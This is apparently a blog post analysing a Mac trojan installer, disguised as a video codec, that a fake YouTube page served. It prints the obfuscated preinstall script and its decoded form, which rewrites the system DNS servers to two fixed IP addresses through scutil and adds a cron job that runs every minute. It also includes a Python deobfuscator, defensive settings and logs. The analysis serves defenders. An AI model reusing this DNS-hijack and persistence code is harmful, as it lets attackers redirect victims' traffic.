The latest xkcd makes a reference to Harrison Ford and ESB1 which I failed to grasp. In an effort to comprehend, I asked Google and was directed to this site. Following my nose led me here, which in turn directed me to a fake YouTube site.
When I clicked on the fake YouTube widget to view the video as prompted, I noticed Finder mount a DMG image in the background and Installer try to install something. I've become so relaxed about security on my Mac that it took a second for me to even realise that something bad was in the process of happening. Fortunately, before I had time to react, the Installer application crashed.
This means that Safari automatically downloaded and mounted a DMG from an unknown and untrusted web site, and then ran the included installer package without asking for permission. This is not cool. Fortunately protecting yourself from this is pretty straightforward:
- In "Safari - Preferences - General" make sure that "Open safe files after downloading" is not ticked.
- In "System Preferences - Accounts - <your account name>" make sure that "Allow user to administer this computer" is not ticked.
The first means that after downloading a file Safari will never automatically run it. This is a minor inconvenience, but it means that nothing can be run without your explicit request (e.g. double-clicking the file).
The second means that if something does get run, the program won't have permissions to do anything which requires admin privileges. This won't stop it from deleting all your personal data, but it will stop it from messing with any system settings.
I've put a copy of the DMG up on my website in case anybody wants to download it and have a look. For those that are curious about what I found when I started to poke around, keep reading.
These lines were generated in "/var/log/system.log":
Aug 30 21:54:14 overkill kernel[0]: Safari[303] Unable to clear quarantine `install.pkg': 30
Aug 30 21:54:17 overkill Installer[16295]: An uncaught exception was raised
Aug 30 21:54:17 overkill Installer[16295]: *** -[NSCFArray removeObjectAtIndex:]: index (1) beyond bounds (1)
Aug 30 21:54:17 overkill Installer[16295]: *** Terminating app due to uncaught exception 'NSRangeException', reason: '*** -[NSCFArray removeObjectAtIndex:]: index (1) beyond bounds (1)'
Aug 30 21:54:17 overkill Installer[16295]: Stack: (\n 2444165451,\n 2518110459,\n 2444164907,\n 2444164970,\n 2496036639,\n 2495531216,\n 2495657399,\n 2417387518,\n 2417386423,\n 273528,\n 158730,\n 2495524637,\n 2495523524,\n 2481334005,\n 2481333682\n)
Aug 30 21:54:35 overkill ReportCrash[16298]: Formulating crash report for process Installer[16295]
Aug 30 21:54:36 overkill com.apple.launchd[100] ([0x0-0x213213].com.apple.installer[16295]): Exited abnormally: Trace/BPT trap
Aug 30 21:54:43 overkill ReportCrash[16298]: Saved crashreport to /Users/adam/Library/Logs/CrashReporter/Installer_2008-08-30-215417_overkill.crash using uid: xxxx gid: yyyy, euid: xxxx egid: yyyy
Aug 30 21:55:10 overkill /usr/sbin/ocspd[16314]: starting
Aug 30 21:55:11 overkill SubmitReport[16311]: Submitted compressed crash report for Installer
In my "~/Downloads/" directory I had a file called "1023.dmg", the file metadata tells me that it was downloaded from "http://64.28.190.22/download/1023.dmg, http://immenseclips.com/m6/movie1.php?id=1658&n=teen".
The DMG mounted itself at "/Volumes/153" and contained a single package called "install.pkg" with these contents:
overkill(adam)$ find /Volumes/153/install.pkg -ls
19 0 drwxr-xr-x 3 adam user 102 Mar 12 00:37 /Volumes/153/install.pkg
20 0 drwxr-xr-x 7 adam user 238 Mar 12 00:37 /Volumes/153/install.pkg/Contents
21 72 -r--r--r-- 1 adam user 35866 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Archive.bom
22 8 -r--r--r-- 1 adam user 3027 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Archive.pax.gz
23 8 -r--r--r-- 1 adam user 1326 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Info.plist
24 8 -r--r--r-- 1 adam user 8 Mar 12 00:37 /Volumes/153/install.pkg/Contents/PkgInfo
25 0 drwxr-xr-x 12 adam user 408 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources
26 8 lrwxr-xr-x 1 adam user 14 Mar 12 23:36 /Volumes/153/install.pkg/Contents/Resources/153.bom -> ../Archive.bom
27 8 lrwxr-xr-x 1 adam user 17 Mar 12 23:36 /Volumes/153/install.pkg/Contents/Resources/153.pax.gz -> ../Archive.pax.gz
28 8 -r--r--r-- 1 adam user 45 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/153.sizes
29 8 -r--r--r-- 1 adam user 554 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/BundleVersions.plist
30 0 drwxr-xr-x 5 adam user 170 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj
31 8 -r--r--r-- 1 adam user 312 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj/153.info
32 8 -rw-r--r-- 1 adam user 342 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj/Description.plist
33 16 -rwxr-xr-x 1 adam user 8027 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj/License.txt
34 8 -r--r--r-- 1 adam user 17 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/package_version
35 8 -rwxr-xr-x 1 adam user 98 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/postinstall
36 8 -rwxr-xr-x 1 adam user 98 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/postupgrade
37 8 -rwxr-xr-x 1 adam user 762 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/preinstall
38 8 -rwxr-xr-x 1 adam user 762 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/preupgrade
The "Archive.bom" claims that it will install these files (none of which actually exist as far as I can tell):
overkill(adam)$ lsbom Archive.bom
. 40777 501/501
./Mozillaplug.plugin 40775 0/80
./Mozillaplug.plugin/Contents 40775 0/80
./Mozillaplug.plugin/Contents/Info.plist 100664 0/80 930 1525506808
./Mozillaplug.plugin/Contents/MacOS 40775 0/80
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin 100775 0/80 24584 1275209212
./Mozillaplug.plugin/Contents/Resources 40775 0/80
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc 100644 0/80 381 3665281426
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE 100664 0/80 381 2963929028
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak 100644 0/80 338 3415230991
./Mozillaplug.plugin/Contents/version.plist 100664 0/80 471 2911002047
./QuickTime.xpt 100755 0/501 762 3209000961
./plugins.settings 100755 0/501 659 869060121
./sendreq 100644 0/501 1214 2574454577
It all looked pretty boring until I found references to "Porn4Mac" in the "Info.plist" and "Description.plist" files:
<key>IFPkgDescriptionDescription</key>
<string>Its a suppa puppa desc yo</string>
<key>IFPkgDescriptionTitle</key>
<string>Porn4Mac</string>
and discovered that the "pre{install,upgrade}" files were "encrypted":
overkill(adam)$ cat preinstall
#!/bin/sh
x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aax.zr;s2=cx.zxx.aaz.ea;sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
ndkf
tkx Sxaxk:/Nkxwnjg/Ginbai/IPs4
q.oynw
uvpx
EOF
)
/voj/obpf/olvxpi << EOF
ndkf
q.pfpx
q.aqq SkjskjAqqjkooko * $1 $2
okx Sxaxk:/Nkxwnjg/Skjsplk/$PSID/DNS
uvpx
EOF
kepox=`ljnfxab -i|tjkd QvplgTphk.edx`
pr [ "$kepox" == "" ]; xykf
klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox
ljnfxab ljnf.pfox
jh -jr ljnf.pfox
rp
jh -jr "$0"
That's suspicious, so now I'm curious and want to know what it's doing.
Basically it "decrypts" the script (really just a tr letter substitution) to a file called "1", then executes it and passes the IP addresses "85.255.115.29" and "85.255.112.61" through as the variables $1 and $2.
The script itself uses scutil to set your DNS servers to the passed IP addresses. It then creates a cronjob to run a file called "/Library/Internet\ Plug-Ins/QuickTime.xpt" every minute. I think it means to copy itself to QuickTime.xpt but I can't actually find where it does that.
overkill(adam)$ s1=cx.zxx.aax.zr; s2=cx.zxx.aaz.ea; echo $s1 | tr qazwsxedcr 0123456789; echo $s2 | tr qazwsxedcr 0123456789
85.255.115.29
85.255.112.61
overkill(adam)$ x=`cat preinstall | wc -l | awk '{print $1}'`; x=`expr $x - 2`; tail -$x "preinstall" | tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv
#!/bin/sh
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)
/usr/sbin/scutil << EOF
open
d.init
d.add ServerAddresses * $1 $2
set State:/Network/Service/$PSID/DNS
quit
EOF
exist=`crontab -l|grep QuickTime.xpt`
if [ "$exist" == "" ]; then
echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
crontab cron.inst
rm -rf cron.inst
fi
rm -rf "$0"
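As an added example (not the post's own code, and not part of the trojan), here is a small Python deobfuscator for the stub shown above: it pulls both tr alphabets out of the first line of preinstall, applies them to a constructed subset of the obfuscated body (shebang, path line and cron line, copied from the post), and extracts the two DNS addresses and the cron target. Nothing is executed; the strings are only translated.

```python
import re

# Stand-in for the first (decoder) line of "preinstall", copied from the post.
STUB_LINE = (
    "x=`cat \"$0\" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;"
    "tail -$x \"$0\" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;"
    "s1=cx.zxx.aax.zr;s2=cx.zxx.aaz.ea;"
    "sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;"
)
# Constructed subset of the obfuscated body: shebang, path line and cron line.
PAYLOAD = (
    "#!/bpf/oy\n"
    'daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"\n'
    'klyn "* * * * * \\"$daxy/QvplgTphk.edx\\">/qks/fvii 2>&1" > ljnf.pfox\n'
)

def body_table(stub_line):
    """Pull the two alphabets of the tr that decodes the body (the one redirected to ">1")."""
    m = re.search(r"tr\s+([a-z]+)\s+([a-z]+)\s*>1;", stub_line)
    if not m or len(m.group(1)) != len(m.group(2)):
        raise ValueError("body tr alphabets not found or of unequal length")
    return str.maketrans(m.group(1), m.group(2))

def decode_body(stub_line, body):
    """Apply the letter substitution; uppercase, digits and punctuation pass through."""
    return body.translate(body_table(stub_line))

def decode_dns_servers(stub_line):
    """Recover the s1/s2 strings and map them through the digit alphabet."""
    m = re.search(r"tr\s+([a-z]{10})\s+(\d{10})", stub_line)
    if not m:
        raise ValueError("digit tr alphabets not found")
    digits = str.maketrans(m.group(1), m.group(2))
    return [v.translate(digits) for _, v in re.findall(r"\b(s\d)=([a-z.]+);", stub_line)]

def cron_target(decoded):
    """Return the full path the decoded script schedules every minute, or None."""
    path = re.search(r'^path="([^"]+)"', decoded, re.M)
    cron = re.search(r'\* \* \* \* \* \\"\$path/([^\\"]+)\\"', decoded)
    if not path or not cron:
        return None
    return f"{path.group(1)}/{cron.group(1)}"

if __name__ == "__main__":
    body = decode_body(STUB_LINE, PAYLOAD)
    print(body)
    print("DNS servers pushed via scutil:", decode_dns_servers(STUB_LINE))
    print("cron target:", cron_target(body))
```

The same approach works on the full preinstall file: read its first two lines as the stub and feed the rest as the body.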
So that's that. It totally failed to work on my Mac, but that's mostly luck; I strongly recommend that everybody take the precautions I mention above to stop a future attack from succeeding.
I do have a couple of unanswered questions (it's late so possibly it'll be obvious in the morning):
- I understand why the DMG got automatically mounted, but why did Installer automatically run the installer program?
- Where is QuickTime.xpt supposed to come from? Other than the cronjob which is supposed to run it, I can't see any mention of it or anywhere that it gets created or copied.
- I don't show it above, but the postinstall script references a file called "sendreq"; again, I can't figure out what is supposed to create it.
- What does it mean that the DMG shows as being downloaded from two different sites? I've never seen that before ...
An unexpected, but interesting, distraction for the night!
UPDATE: Apparently this is old news and has been thoroughly discussed elsewhere. It does appear that the version I found is slightly different than the ones being discussed online, but it's very similar.
- Yes I realise that I lose nearly infinite nerd points for not instantaneously realising that ESB stands for "Empire Strikes Back".